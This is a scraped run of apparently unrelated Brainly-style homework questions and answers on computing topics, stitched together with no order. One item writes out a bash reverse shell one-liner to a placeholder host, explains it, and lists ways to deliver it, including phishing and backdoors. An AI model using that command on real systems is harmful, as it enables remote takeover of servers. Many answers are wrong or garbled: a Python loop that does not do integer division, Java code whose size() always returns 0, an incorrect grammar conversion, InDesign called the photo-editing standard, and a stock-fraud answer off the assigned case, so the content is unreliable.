Among the information technologies that assist information systems in making decisions are computer networks and database systems.
Which is a key part of information systems and is composed of uncooked data?Data are abstract, unprocessed facts that are saved, communicated, analyzed, and processed by other information system components.
A financial information system supports what decision?The optimal financial management information system should aid in the organization's decision-making process. In order for policies to be effective, they must be supported by accurate and trustworthy data, which should eventually originate from the FMIS. Input, output, and memory devices are among the software elements of a management information system (MIS).
To know more about information technologies visit :-
https://brainly.com/question/14426682
#SPJ4
With the help of the network, the attacker can obtain the shell or root shell of the remote server (Linux operating system-based) through the reverse shell attack, and then get full control of the server. The typical reverse shell instruction is as follows:
/bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1"
1) Please explain the meaning of 0,1,2,>, <, & represented in the above statement;
2) What does the attacker need to do on his machine in order to successfully get the shell information output on the server side? And please explain the meaning represented by /dev/tcp/server_ip/9090;
3) Combined with the above statement, explain the implementation process of reverse shell attack;
4) Combined with the relevant knowledge learned in our class, what attacking methods can be used to successfully transmit and execute the above reverse shell instruction on the server side?
1. 0 represents standard input (stdin), 1 represents standard output (stdout), 2 represents standard error (stderr), > is output redirection, < is input redirection, and & is used for file descriptor redirection.
2. In this case, the attacker should listen on port 9090 using a tool such as netcat or a similar utility.
3.Identify vulnerable system, craft reverse shell payload, deliver payload to target, execute payload to establish connection with attacker are methods for implementation.
4. Exploiting vulnerabilities, social engineering, planting malware/backdoors, compromising trusted user accounts can be used to execute the reverse shell instruction.
1. In the reverse shell instruction provided ("/bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1"), the symbols 0, 1, 2, >, <, and & represent the following:
0: It represents file descriptor 0, which is the standard input (stdin).
1: It represents file descriptor 1, which is the standard output (stdout).
2: It represents file descriptor 2, which is the standard error (stderr).
: It is the output redirection symbol and is used to redirect the output of a command to a file or device.
<: It is the input redirection symbol and is used to redirect input from a file or device to a command.
&: It is used for file descriptor redirection, specifically in this case, combining stdout and stderr into a single stream.
2. To successfully get the shell information output on the server side, the attacker needs to set up a listening service on their own machine. In this case, the attacker should listen on port 9090 using a tool such as netcat or a similar utility. The "/dev/tcp/server_ip/9090" in the reverse shell instruction represents the connection to the attacker's machine on IP address "server_ip" and port 9090. By specifying this address and port, the attacker creates a connection between their machine and the compromised server, allowing the output of the shell to be sent to their machine.
3. The reverse shell attack is typically performed in the following steps:
The attacker identifies a vulnerability in the target server and gains control over it.The attacker crafts a payload that includes the reverse shell instruction, which allows the attacker to establish a connection with their machine.The attacker injects or executes the payload on the compromised server, initiating the reverse shell connection.The reverse shell instruction creates a new shell on the compromised server and connects it to the attacker's machine, redirecting the shell's input and output streams to the network connection.Once the reverse shell connection is established, the attacker gains interactive access to the compromised server, obtaining a shell or root shell, and can execute commands as if they were directly working on the server itself.4. Successfully transmit and execute the reverse shell instruction on the server side, the attacker can use various attacking methods, including:
Exploiting a vulnerability: The attacker can search for known vulnerabilities in the target server's operating system or specific applications running on it. By exploiting these vulnerabilities, they can gain unauthorized access and inject the reverse shell payload.
Social engineering: The attacker may use social engineering techniques, such as phishing emails or deceptive messages, to trick a user with access to the server into executing the reverse shell payload unknowingly.
Malware or backdoor installation: If the attacker already has control over another system on the same network as the target server, they may attempt to install malware or a backdoor on that system. This malware or backdoor can then be used to launch the reverse shell attack on the target server.
Compromising a trusted user account: The attacker may target and compromise a user account with privileged access on the server. With the compromised account, they can execute the reverse shell instruction and gain control over the server.
It is important to note that carrying out such attacks is illegal and unethical unless done with proper authorization and for legitimate security testing purposes.
For more questions on Linux operating system-based
https://brainly.com/question/31763437
#SPJ11
How are viruses different from worms?
Explanation:
Viruses and worms both cause damage and copy themselves rapidly. The main difference is how they self-replicate, with viruses requiring the help of a host and worms acting independently. Unlike viruses, worms can replicate and spread without any human activation.
mark me brainliest
Who can add entries to value log
Answer:
b
Explanation:
NG STOCK MARKET FRAUD
Assignment Directions
1. For this assignment, you will explore securities or stock market fraud. Title your assignment "Stock Fraud" and ther
list the case you analyzed.
2. Visit the SEC Web site. Select and read through one of the actions against Enron.
Submission Requirements
1. Write a summary of the facts of the case, your understanding of all security law violations, and any settlement or
payment made to the stock-holders or others. Explore her online sources to get additional information.
2. The paper must be between one and two pages in length, double spaced, and with one-inch margins. Be sure to
include a reference page.
e.owschools.com/owsoo/studentAssignment/index?eh-390541091 #section Tab you like to do next?
Stock market fraud refers to the fraudulent practice of manipulating stock prices and the market. The Nigerian Stock Market Fraud, also known as the N14 billion stock fraud, is one of the most notorious cases of stock market fraud that happened in Nigeria.
It occurred between 2001 and 2002 and involved some of Nigeria’s most influential figures, including stockbrokers, top executives of blue-chip companies, and bankers.The Nigerian Stock Market Fraud is one of the largest stock market scandals in the world. It was the result of a lack of regulation and oversight in the Nigerian stock market, which allowed fraudulent practices to thrive.
The Securities and Exchange Commission (SEC) is the regulatory body responsible for regulating the Nigerian Stock Exchange. However, the SEC was ineffective in preventing the fraud from occurring, and many of its officials were implicated in the scandal.The N14 billion stock fraud involved the manipulation of stock prices, insider trading, and market rigging.
The fraudsters would inflate the price of stocks artificially, then sell the stocks to unsuspecting investors at inflated prices. They would then use the proceeds from the sale of the stocks to buy more stocks, further inflating the prices.
The fraudsters also engaged in insider trading, where they would use insider information to make trades in the stock market. This gave them an unfair advantage over other investors and allowed them to make huge profits from their trades.
In conclusion, the Nigerian Stock Market Fraud was a result of a lack of regulation and oversight in the Nigerian stock market. The SEC was ineffective in preventing the fraud from occurring, and many of its officials were implicated in the scandal. The fraudsters engaged in the manipulation of stock prices, insider trading, and market rigging.
For more such questions on Stock market, click on:
https://brainly.com/question/690070
#SPJ8
The color in a circle is a _____________ data type.
Answer:
b
Explanation:
what is the first computer company
Electronic Controls Company it was founded on 1949 by J.Presper and John Mauchly
Answer: Electronic Controls Company
Explanation: The first computer company was Electronic Controls Company and was founded in 1949 by J. Presper Eckert and John Mauchly, the same individuals who helped create the ENIAC computer.
Hope this helps^^
What is the importance of knowing the concept of programming?
Answer:
Computer programming is important today because so much of our world is automated. Humans need to be able to control the interaction between people and machines. Since computers and machines are able to do things so efficiently and accurately, we use computer programming to harness that computing power.
Write a while loop that prints userNum divided by 2 (integer division) until reaching 1. Follow each number by a space. Example output for userNum
userNum = int(input("Enter a number: "))
while userNum > 1:
print(userNum, end=" ")
userNum /= 2
I wrote my code in python 3.8. I think this is what you want but I'm not too sure. I'll change the code if you need me to.
The White House spokesman said that if the relevant bill was sent to the desk, US President Biden would sign to end the national emergency of COVID-19 in advance, although he strongly opposed it. The US Senate will vote on the evening of the 29th local time and is expected to pass
The requirement for the Senate to vote on the bill is a standard legislative process in the United States.
Why the senate votes on billsIn order for a bill to become law, it needs to be approved by both the House of Representatives and the Senate. The legislative branch of the US government is divided into two chambers—the House of Representatives and the Senate—each with its own set of responsibilities.
Once a bill is introduced in either chamber, it goes through a series of committee reviews, debates, and amendments before being put to a vote.
Read more on bills here https://brainly.com/question/29613391
#SPJ1
The White House spokesman said that if the relevant bill was sent to the desk, US President Biden would sign to end the national emergency of COVID-19 in advance, although he strongly opposed it. The US Senate will vote on the evening of the 29th local time and is expected to pass
Why does the senate have to vote on a bill
In an ancient land, the beautiful princess Eve (or handsome prince Val) had many suitors. Being royalty, it was decided that a special process must be used to determine which suitor would win the hand of the prince/princess. First, all of the suitors would be lined up one after the other and assigned numbers. The first suitor would be number 1, the second number 2, and so on up to the last suitor, number n. Starting at 4 the suitor in the first position, she/he would then count three suitors down the line (because of the three letters in his/her name) and that suitor would be eliminated and removed from the line. The prince/princess would then continue, counting three more suitors, and eliminate every third suitor. When the end of the line is reached, counting would continue from the beginning. For example, if there were 6 suitors, the elimination process would proceed as follows:_____.
12456 Suitor 3 eliminated; continue counting from 4.
1245 Suitor 6 eliminated; continue counting from 1.
125 Suitor 4 eliminated; continue counting from 5.
15 Suitor 2 eliminated; continue counting from 5.
1 Suitor 5 eliminated; 1 is the lucky winner.
Write a program that creates a circular linked list of nodes to determine which position you should stand in to marry the princess if there are n suitors. Your program should simulate the elimination process by deleting the node that corresponds to the suitor that is eliminated for each step in the process.
Explanation:
public class CircularLinkedListTest
{
private Node head;
private int size;
private class Node
{
private int num;
private Node next;
public Node(int n)
{
num = n;
next = null;
}
public int getNum()
{
return num;
}
public void setNext(Node n)
{
this.next = n;
}
public Node getNext()
{
return next;
}
}
public CircularLinkedListTest ()
{
head = null;
int numNodes = 0;
}
public void add(int num)
{
int numNodes = 0;
if(head == null)
{
head = new Node(num);
head.setNext(head);
numNodes++;
}
else
{
Node temp = head;
while(temp.getNext() != head)
temp = temp.getNext();
temp.setNext(new Node(num));
temp.getNext().setNext(head);
numNodes++;
}
}
public int size()
{
int numNodes = 0;
return numNodes;
}
public int get(int index)
{
Node t = head;
for(int i = 0; i < index; i++)
t= t.getNext();
return t.getNum();
}
public int remove(int index)
{
if(index < 0 || index >= size)
{
System.out.println("Error, index out of Qbounds.");
System.exit(0);
}
Node temp = head;
if(index == 0)
{
while(temp.getNext() != head)
temp = temp.getNext();
int value = head.getNum();
if(size > 1)
{
head = head.getNext();
temp.setNext(head);
}
else
head = null;
size--;
return value;
}
else
{
for(int i = 0; i < index - 1; i++)
temp = temp.getNext();
int answer = temp.getNext().getNum();
temp.setNext(temp.getNext().getNext());
size--;
return answer;
}
}
public static void main(String args[])
{
CircularLinkedListTest suitors = new CircularLinkedListTest ();
for(int i = 1; i <= 6; i++)
suitors.add(i);
int currentIndex = 0;
while(suitors.size() != 1)
{
for(int i = 1; i <= 2; i++)
{
currentIndex++;
if(currentIndex == suitors.size())
currentIndex = 0;
}
suitors.remove(currentIndex);
if(currentIndex == suitors.size())
currentIndex = 0;
for(int i = 0; i < suitors.size(); i++)
System.out.print(suitors.get(i) + " ");
System.out.println();
}
}
}
Write some keywords about touchscreen
\({\huge{\underline{\bold{\mathbb{\blue{ANSWER}}}}}}\)
______________________________________
\({\hookrightarrow{Keywords}}\)
touchscreentouch inputmulti-touchgesturesstylusresistivecapacitivehaptic feedbacktouch latencytouch accuracytouch sensitivitytouch screen technologytouch screen interfacetouch screen displaytouch screen monitortouch screen laptoptouch screen phoneWhich of the following is true of powering the Epilog Helix Laser on/off you?
A. Pull cord
B. Use the switch on the lower left side
C. Never turn off machine
D. It turns off when not in use
I need it asap!! thanks
The correct answer for powering the Epilog Helix Laser on/off is B. Use the switch on the lower left side.
When using the Epilog Helix Laser, it is important to follow the proper procedures for turning the machine on and off to ensure safe operation and prevent any damage to the equipment. The Epilog Helix Laser is typically equipped with a switch located on the lower left side of the machine, which serves as the main power control.
To power on the Epilog Helix Laser, you would use the switch on the lower left side. By flipping the switch to the "on" position, the machine's power supply will be activated, allowing you to operate the laser and perform various tasks such as engraving or cutting.
Conversely, when you are finished using the Epilog Helix Laser or need to power it off for any reason, you would also use the same switch on the lower left side.
By switching it to the "off" position, you effectively shut off the power supply to the machine, ensuring that it is safely turned off and not consuming any unnecessary energy.
It is important to note that when the Epilog Helix Laser is not in use for an extended period, it is generally recommended to power it off completely to conserve energy and prevent any potential hazards.
By using the designated switch on the lower left side, you have control over the machine's power status and can turn it on or off as needed, promoting safe and efficient operation.
Correct amswer is B. Use the switch on the lower left side.
For more questions on Laser
https://brainly.com/question/31200718
#SPJ11
Which factor increases the risk of IS project delays?
A.
loss of hardware
B.
shortage of technical staff
C.
poor password practices
D.
loss of equipment
E.
environmental issue
which of these are correctly formatted python lists? check all that apply
Options
-list1=(race, cars, trucks, bikes)
-list2=["computer science', 'math', 'psychology']
-list3=('summer', 'winter', 'spring')
-list5[52, 24, 71, 56]
The first and third option are actually tuples, not lists. Tuples and lists are identical except for the fact that you cannot change the elements in a tuple but you can in a list. The last option is incorrect because there is no equal sign that assigns those numbers to the variable name list5.
The only option that makes sense is option 2, list2
Answer:
B, C, and E :)
Explanation:
programming languages are used for giving instructions to computers
Programming languages are used for giving instructions to computers is a true statement.
Do programming languages give computer instructions?Using computer programming languages, we can communicate with a computer in a language that it can understand.
There are numerous computer programming languages available that programmers can use to interact with a computer, just as there are numerous human-based languages.
Therefore, a programming language is seen as a set of rules that tends to gives the computer instructions on what actions to take. There are a lot of programming languages; some examples are BASIC, COBOL, and others.
Learn more about Programming languages from
https://brainly.com/question/16936315
#SPJ1
programming languages are used for giving instructions to computers. True/false
For each of the following memory accesses indicate if it will be a cache hit or miss when carried out in sequence as listed. Also, give the value of a read if it can be inferred from the information in the cache.
Operation Address Hit? Read value (or unknown)
Read 0x834
Write 0x 836
Read 0xFFD
Answer:
Explanation:
Operation Address Hit? Read Value
Read 0x834 No Unknown
Write 0x836 Yes (not applicable)
Read 0xFFD Yes CO
PLEASE HELP ME ANSWER THIS QUESTION. I REALLY REALLY NEED IT.
. According to IEEE, what is software engineering? (A) The study of
approaches (B) The development of software product using scientific
principles, methods, and procedures (C) The application of engineering
to software (D) All of the above
IEEE (Institute of Electrical and Electronics Engineers) describes software engineering as:
(D) All of the above.
Software engineering encompasses the study of approaches, and the development of software products using scientific principles, methods, and procedures. It also encompasses the application of engineering principles to software. It is a multidisciplinary field that combines technical knowledge, problem-solving skills, and systematic processes to design, develop, and maintain software systems efficiently and effectively.
Every programming language has rules governing its word usage and punctuation.
True
False
Answer:
False. Every programming language has syntax rules governing its word usage and punctuation.
Dan is working on a printing project. Which important points must he consider while printing? document size texture printing stock color mode He must print in CMYK because that color mode retains all the colors. arrowRight He must keep the font size at 12 points to maintain proper readability. arrowRight He must use paper that’s glossy on one side and uncoated on the other to produce fine-quality prints. arrowRight He must avoid printing on colored stock to avoid distortion of the ink color.
Answer:
Down below
Explanation:
Color Mode - He must print in CMYK because that color mode retains all the colors.
Document Size - He must keep the font size at 12 points to maintain proper readability.
Texture - He must use paper that’s glossy on one side and uncoated on
the other to produce fine-quality prints.
Printing Stock - He must avoid printing on colored stock to avoid distortion of the ink color.
Colour Mode—He must print in CMYK because that colour mode retains all the colours. Document Size—He must keep the font size at 12 points to maintain proper readability. Texture—He must use paper that’s glossy on one side and uncoated on the other to produce fine-quality prints. Printing Stock—He must avoid printing on coloured stock to avoid distortion of the ink colour.
What is Texture?Felt-textured papers are frequently described as soft and having a woven or textile-like appearance.
In menus, stationery, and when searching for an artistic flourish to go with a design or image, the paper's surface can be employed to great effect when printing images.
Thus, the statement are matched above.
For more details about textured, click here:
https://brainly.com/question/14989874
#SPJ5
Convert the following to CNF: S→SS|AB|B A→aAAa B→ bBb|bb|Ꜫ C→ CC|a D→ aC|bb
To convert the given grammar into Chomsky Normal Form (CNF), we need to rewrite the rules and ensure that each production has only two non-terminals or one terminal on the right-hand side. Here is the converted CNF grammar:
1. S → SS | AB | B
2. A → AA
3. A → a
4. B → bBb | bb | ε
5. C → CC | a
6. D → aC | bb
Explanation:
1. The production S → SS has been retained as it is.
2. The production A → aAAa has been split into A → AA and A → a.
3. The production B → bBb has been split into B → bB and B → b.
4. The production B → bb has been kept as it is.
5. The production B → ε (empty string) has been denoted as B → ε.
6. The production C → CC has been retained as it is.
7. The production C → a has been kept as it is.
8. The production D → aC has been kept as it is.
9. The production D → bb has been kept as it is.
In summary, the given grammar has been converted into Chomsky Normal Form (CNF), where each production has either two non-terminals or one terminal on the right-hand side. This form is useful in various parsing and analysis algorithms.
For more questions on parsing, click on:
https://brainly.com/question/13211785
#SPJ8
Answer:
Explanation:
To convert the given grammar to Chomsky Normal Form (CNF), we need to follow a few steps:
Step 1: Eliminate ε-productions (productions that derive the empty string).
Step 2: Eliminate unit productions (productions of the form A → B).
Step 3: Convert long productions (productions with more than two non-terminals) into multiple productions.
Step 4: Convert terminals in remaining productions to new non-terminals.
Step 5: Ensure all productions are in the form A → BC (binary productions).
Applying these steps to the given grammar:
Step 1: Eliminate ε-productions
The given grammar doesn't have any ε-productions.
Step 2: Eliminate unit productions
The given grammar doesn't have any unit productions.
Step 3: Convert long productions
S → SS (Remains the same)
S → AB
A → aAAa
B → bBb
B → bb
C → CC
C → a
D → aC
D → bb
Step 4: Convert terminals
No changes are needed in this step as all terminals are already in the grammar.
Step 5: Ensure binary productions
The given grammar already consists of binary productions.
The converted grammar in Chomsky Normal Form (CNF) is:
S → SS | AB
A → aAAa
B → bBb | bb
C → CC | a
D → aC | bb
Note: The original grammar didn't include the production rules for the non-terminals 'S', 'C', and 'D'. I assumed the missing production rules based on the provided information.
How does asymmetric encryption work?
A.
It uses only one key to encrypt and decrypt a message.
B.
A private key is used to encrypt the message and the public key is used to decrypt the message.
C.
Either the public key or the private key can be used to encrypt and decrypt a message.
D.
Public key is used to encrypt the message and private key is used to decrypt the message.
Answer:
i choose choice D
Explanation:
reason as to my answer public keys are simply input keys used to encrypt data into either a computer or any electrical device as private keys are out put used to either erase or edit
Which of the following statements is true concerning the Internet of Things (IoT)? Wearable technologies are the only devices that currently connect to the Internet of Things. IoT is not affecting many businesses and the products they offer. Growth is expected to slow down over the next five years. IoT technology is relatively new and is expanding exponentially.
Answer:
i was looking and i think the answer would be growth slowing down but i might be wrong
Explanation:
Which of the following statements is true concerning the Internet of Things IoT is that the technology is relatively new and is expanding exponentially.
The IoT is regarded as a large network of connected things and individual. They collect and share data about the way they are used and about the environment around them.It is aimed to connect all potential objects to interact each other on the internet to provide secure and a more comfort life for people.
The future of IoT has the prediction to be limitless with great advances and the industrial internet will be accelerated.
Conclusively, the Internet of Things (IoT) connect the world together.
Learn more from
https://brainly.com/question/14397947
Lossy compression means that when you compress the file, you're going to lose some of the detail.
True
False
Question 2
InDesign is the industry standard for editing photos.
True
False
Question 3
Serif fonts are great for print media, while sans serif fonts are best for digital media.
True
False
Question 4
You should avoid using elements of photography such as repetition or symmetry in your photography.
True
False
Lossy compression means that when you compress the file, you're going to lose some of the detail is a true statement.
2. InDesign is the industry standard for editing photos is a true statement.
3. Serif fonts are great for print media, while sans serif fonts are best for digital media is a true statement.
4. You should avoid using elements of photography such as repetition or symmetry in your photography is a false statement.
What lossy compression means?The term lossy compression is known to be done to a data in a file and it is one where the data of the file is removed and is not saved to its original form after it has undergone decompression.
Note that data here tends to be permanently deleted, which is the reason this method is said to be known as an irreversible compression method.
Therefore, Lossy compression means that when you compress the file, you're going to lose some of the detail is a true statement.
Learn more about File compression from
https://brainly.com/question/9158961
#SPJ1
Your company has been assigned the 194.10.0.0/24 network for use at one of its sites. You need to calculate a subnet mask that will accommodate 60 hosts per subnet while maximizing the number of available subnets. What subnet mask will you use in CIDR notation?
To accommodate 60 hosts per subnet while maximizing the number of available subnets, we need to use a subnet mask that provides enough host bits and subnet bits.
How to calculateTo calculate the subnet mask, we determine the number of host bits required to accommodate 60 hosts: 2^6 = 64. Therefore, we need 6 host bits.
Subsequently, we determine the optimal quantity of subnet bits needed to increase the quantity of accessible subnets: the formula 2^n >= the amount of subnets is used. To account for multiple subnets, the value of n is set to 2, resulting in a total of 4 subnets.
Therefore, we need 2 subnet bits.
Combining the host bits (6) and subnet bits (2), we get a subnet mask of /28 in CIDR notation.
Read more about subnet mask here:
https://brainly.com/question/28390252
#SPJ1
What will be the output?
class num:
def __init__(self, a);
self.number = a
def_mul__(self,b):
* return self.number + b.number
#main program
numA = num(8)
numB = num(4)
result = numA* numb
print(result)
O4
O 12
O 32
4096
the variable a & b and A & B are different. So the only program that work is at #main program.
Hence that A = 8 and B = 4 and the result is A * B so 8*4=32.
Sorry if im wrong
32 will be the output of this question
What is the output?An industry's output is the total amount of goods and services generated within that industry over a specific time period and sold to customers or other firms. An industry's annual production of boxes of cookies or tons of sugar, for instance, can be considered output.
The quantity a person produces in a particular period of time. d.: energy or power given or produced by a device or system (as for storage or for conversion in kind or in characteristics)Here is how we might define these two phrases in business terms: The results are what the business requires or wants to accomplish. The acts or things that help achieve an outcome are called the outputs.
Variables a and b and A and B are distinct. Thus, the #main program is the only program that functions. Because A = 8 and B = 4, the outcome is A * B, which equals 8*4=32.
Therefore, the output of this question
Learn more about output here:
https://brainly.com/question/13736104
#SPJ5
This program extends the earlier "Online shopping cart" program. (Consider first saving your earlier program).
(1) Extend the ItemToPurchase struct to contain a new data member. (2 pt)
char itemDescription[ ] - set to "none" in MakeItemBlank()
Implement the following related functions for the ItemToPurchase struct.
PrintItemDescription()
Has an ItemToPurchase parameter.
(2) Create three new files:
ShoppingCart.h - struct definition and related function declarations
ShoppingCart.c - related function definitions
main.c - main() function (Note: main()'s functionality differs from the warm up)
Build the ShoppingCart struct with the following data members and related functions. Note: Some can be function stubs (empty functions) initially, to be completed in later steps.
Data members (3 pts)
char customerName [ ]
char currentDate [ ]
ItemToPurchase cartItems [ ] - has a maximum of 10 slots (can hold up to 10 items of any quantity)
int cartSize - the number of filled slots in array cartItems [ ] (number of items in cart of any quantity)
Related functions
AddItem()
Adds an item to cartItems array. Has parameters of type ItemToPurchase and ShoppingCart. Returns ShoppingCart object.
RemoveItem()
Removes item from cartItems array (does not just set quantity to 0; removed item will not take up a slot in array). Has a char[ ](an item's name) and a ShoppingCart parameter. Returns ShoppingCart object.
If item name cannot be found, output this message: Item not found in cart. Nothing removed.
ModifyItem()
Modifies an item's description, price, and/or quantity. Has parameters of type ItemToPurchase and ShoppingCart. Returns ShoppingCart object.
GetNumItemsInCart() (2 pts)
Returns quantity of all items in cart. Has a ShoppingCart parameter.
GetCostOfCart() (2 pts)
Determines and returns the total cost of items in cart. Has a ShoppingCart parameter.
PrintTotal()
Outputs total of objects in cart. Has a ShoppingCart parameter.
If cart is empty, output this message: SHOPPING CART IS EMPTY
PrintDescriptions()
Outputs each item's description. Has a ShoppingCart parameter.
(3) In main(), prompt the user for a customer's name and today's date. Output the name and date. Create an object of type ShoppingCart. (1 pt)
(4) Implement the PrintMenu() function in main.c to print the following menu of options to manipulate the shopping cart. (1 pt)
(5) Implement the ExecuteMenu() function in main.c that takes 2 parameters: a character representing the user's choice and a shopping cart. ExecuteMenu() performs the menu options (described below) according to the user's choice, and returns the shopping cart. (1 pt)
(6) In main(), call PrintMenu() and prompt for the user's choice of menu options. Each option is represented by a single character.
If an invalid character is entered, continue to prompt for a valid choice. When a valid option is entered, execute the option by calling ExecuteMenu() and overwrite the shopping cart with the returned shopping cart. Then, print the menu and prompt for a new option. Continue until the user enters 'q'. Hint: Implement Quit before implementing other options. (1 pt)
(7) Implement the "Output shopping cart" menu option in ExecuteMenu(). (3 pts)
8) Implement the "Output item's description" menu option in ExecuteMenu(). (2 pts)
(9) Implement "Add item to cart" menu option in ExecuteMenu(). (3 pts)
(10) Implement the "Remove item from cart" menu option in ExecuteMenu(). (4 pts)
(11) Implement "Change item quantity" menu option in ExecuteMenu(). Hint: Make new ItemToPurchase object before using ModifyItem() function. (5 pts)
Answer:
To create an online shopping cart. You need to do the following:
Update the ItemToPurchase struct to include a new data member called itemDescription.
Create three new files: ShoppingCart.h, ShoppingCart.c, and main.c.
Build the ShoppingCart struct with the following data members: customerName, currentDate, cartItems (which can hold up to 10 items of any quantity), and cartSize.
Implement the AddItem, RemoveItem, ModifyItem, GetNumItemsInCart, GetCostOfCart, PrintTotal, and PrintDescriptions functions for the ShoppingCart struct.
In the main function, prompt the user for a customer's name and today's date, and create an object of type ShoppingCart.
Implement a menu of options to manipulate the shopping cart in the PrintMenu function in main.c.
Implement the ExecuteMenu function in main.c to perform the menu options according to the user's choice.
Implement the "Output shopping cart" menu option in ExecuteMenu.
Implement the "Output item's description" menu option in ExecuteMenu.
Implement the "Add item to cart" menu option in ExecuteMenu.
Implement the "Remove item from cart" menu option in ExecuteMenu.
Implement the "Change item quantity" menu option in ExecuteMenu.
Note: Each step has a point value assigned to it, and some steps have hints provided.
3
Drag each label to the correct location on the image.
An organization has decided to initiate a business project. The project management team needs to prepare the project proposal and business
justification documents. Help the management team match the purpose and content of the documents.
contains high-level details
of the proposed project
contains a preliminary timeline
of the project
helps to determine the project type,
scope, time, cost, and classification
helps to determine whether the
project needs meets business
needs
contains cost estimates,
project requirements, and risks
helps to determine the stakeholders
relevant to the project
Project proposal
Business justification
Here's the correct match for the purpose and content of the documents:
The Correct Matching of the documentsProject proposal: contains high-level details of the proposed project, contains a preliminary timeline of the project, helps to determine the project type, scope, time, cost, and classification, helps to determine the stakeholders relevant to the project.
Business justification: helps to determine whether the project needs meet business needs, contains cost estimates, project requirements, and risks.
Please note that the purpose and content of these documents may vary depending on the organization and specific project. However, this is a general guideline for matching the labels to the documents.
Read more about Project proposal here:
https://brainly.com/question/29307495
#SPJ1
Can you provide an example of how computer programming is applied in real-
world situations?
An example of how computer programming is applied in real world situations is the use of traffic lights.
How is this so?
The traffic flow data is processed by the computer to establish the right sequence for the lights at junctions or ramps. The sequencing information is sent from the computer to the signals via communications equipment.
INRIX Signal Analytics is the first cloud-based solution that harnesses big data from linked automobiles to assist traffic experts in identifying and understanding excessive delays at signalized junctions throughout the country — with no hardware or fieldwork required.
Learn more about computer programming:
https://brainly.com/question/14618533
#SPJ1
In discussing a page replacement algorithm, one author makes an analogy with a snowplow moving around a circular track. Snow is falling uniformly on the track and a lone snowplow continually circles the track at constant speed. The snow that is plowed off the track disappears from the system.
a. For which of the page replacement algorithms discussed in Section 8.2 is this a useful analogy?
b. What does this analogy suggest about the behavior of the page replacement algorithm in question?
Answer and Explanation:
A. The answer to the question is a FIFO page replacement algorithm. In full, this is a first in, first out algorithm. From the question, the snowplow continuously circles the track and it does this at a constant speed.
B. This analogy suggests the removal of the page that was created earliest. Such that by doing so, new pages would be put at the beginning of the list and the page at the tail end would be removed.
Which of these set of instructions will create a new blank document
Answer:
If you already have a file open in Word, you can create a new document by clicking File>New. You can also use the shortcut Ctrl+N (Command+N for Mac). To open a blank document, double-click the blank document option.